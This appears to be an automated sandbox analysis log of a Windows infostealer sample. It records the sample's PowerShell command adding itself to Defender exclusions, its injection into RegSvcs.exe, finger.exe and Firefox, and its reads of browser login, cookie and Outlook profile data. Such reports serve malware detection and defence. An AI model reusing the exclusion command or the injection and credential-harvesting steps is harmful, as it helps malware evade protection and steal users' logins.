Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01358D59 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01358D59 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01350D59 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01350D59 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01350D59 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01378DBF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01378DBF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0138CDB1 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0138CDB1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0138CDB1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01386DA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_01346DF6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0137CDF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0137CDF0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013F0DF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_013F0DF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0135ADE0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0135ADE0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
Source: C:\Users\user\Desktop\oss4CtI8oz.exe; Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\oss4CtI8oz.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oss4CtI8oz.exe"
Source: C:\Users\user\Desktop\oss4CtI8oz.exe; Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe; NtSetInformationThread: Direct from: 0x77D62B4C
Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe; NtReadVirtualMemory: Direct from: 0x77D62E8C
Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe; NtCreateKey: Direct from: 0x77D62C6C
Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe; NtQueryAttributesFile: Direct from: 0x77D62E6C
Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe; NtQuerySystemInformation: Direct from: 0x77D648CC
Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe; NtQueryVolumeInformationFile: Direct from: 0x77D62F2C
Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe; NtAllocateVirtualMemory: Direct from: 0x77D648EC
Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe; NtOpenSection: Direct from: 0x77D62E0C
Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe; NtDeviceIoControlFile: Direct from: 0x77D62AEC
Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe; NtQuerySystemInformation: Direct from: 0x77D62DFC
Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe; NtReadFile: Direct from: 0x77D62ADC
Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe; NtDelayExecution: Direct from: 0x77D62DDC
Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe; NtQueryInformationProcess: Direct from: 0x77D62C26
Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe; NtResumeThread: Direct from: 0x77D62FBC
Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe; NtWriteVirtualMemory: Direct from: 0x77D6490C
Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe; NtCreateUserProcess: Direct from: 0x77D6371C
Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe; NtClose: Direct from: 0x77D62B6C
Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe; NtAllocateVirtualMemory: Direct from: 0x77D63C9C
Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe; NtSetInformationProcess: Direct from: 0x77D62C5C
Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe; NtProtectVirtualMemory: Direct from: 0x77D62F9C
Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe; NtNotifyChangeKey: Direct from: 0x77D63C2C
Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe; NtWriteVirtualMemory: Direct from: 0x77D62E3C
Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe; NtSetInformationThread: Direct from: 0x77D563F9
Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe; NtCreateMutant: Direct from: 0x77D635CC
Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe; NtResumeThread: Direct from: 0x77D636AC
Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe; NtMapViewOfSection: Direct from: 0x77D62D1C
Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe; NtProtectVirtualMemory: Direct from: 0x77D57B2E
Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe; NtAllocateVirtualMemory: Direct from: 0x77D62BFC
Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe; NtAllocateVirtualMemory: Direct from: 0x77D62BEC
Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe; NtQueryInformationToken: Direct from: 0x77D62CAC
Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe; NtCreateFile: Direct from: 0x77D62FEC
Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe; NtOpenFile: Direct from: 0x77D62DCC
Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe; NtTerminateThread: Direct from: 0x77D62FCC
Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe; NtOpenKeyEx: Direct from: 0x77D62B9C
Source: C:\Users\user\Desktop\oss4CtI8oz.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Section loaded: NULL target: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Section loaded: NULL target: C:\Windows\SysWOW64\finger.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\finger.exe; Section loaded: NULL target: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe protection: read write
Source: C:\Windows\SysWOW64\finger.exe; Section loaded: NULL target: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeThread register set: target process: 4772Jump to behavior
                Source: C:\Windows\SysWOW64\finger.exeThread APC queued: target process: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: BDC008Jump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oss4CtI8oz.exe"Jump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeProcess created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: DzuG1v7KGGzqI4w.exe, 00000006.00000000.993002542.00000000015E1000.00000002.00000001.00040000.00000000.sdmp, DzuG1v7KGGzqI4w.exe, 00000006.00000002.3339265026.00000000015E1000.00000002.00000001.00040000.00000000.sdmp, DzuG1v7KGGzqI4w.exe, 00000009.00000000.1144432309.0000000000C21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: DzuG1v7KGGzqI4w.exe, 00000006.00000000.993002542.00000000015E1000.00000002.00000001.00040000.00000000.sdmp, DzuG1v7KGGzqI4w.exe, 00000006.00000002.3339265026.00000000015E1000.00000002.00000001.00040000.00000000.sdmp, DzuG1v7KGGzqI4w.exe, 00000009.00000000.1144432309.0000000000C21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: DzuG1v7KGGzqI4w.exe, 00000006.00000000.993002542.00000000015E1000.00000002.00000001.00040000.00000000.sdmp, DzuG1v7KGGzqI4w.exe, 00000006.00000002.3339265026.00000000015E1000.00000002.00000001.00040000.00000000.sdmp, DzuG1v7KGGzqI4w.exe, 00000009.00000000.1144432309.0000000000C21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: DzuG1v7KGGzqI4w.exe, 00000006.00000000.993002542.00000000015E1000.00000002.00000001.00040000.00000000.sdmp, DzuG1v7KGGzqI4w.exe, 00000006.00000002.3339265026.00000000015E1000.00000002.00000001.00040000.00000000.sdmp, DzuG1v7KGGzqI4w.exe, 00000009.00000000.1144432309.0000000000C21000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeQueries volume information: C:\Users\user\Desktop\oss4CtI8oz.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                Source: Yara match | File source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000004.00000002.1067799190.00000000012B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3337490870.0000000000B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3336839914.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3337645809.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.1066763202.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.3342147165.00000000049E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3339789952.0000000002C00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.1074125583.0000000001770000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\finger.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\finger.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\finger.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\finger.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\finger.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\finger.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\finger.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\finger.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\finger.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
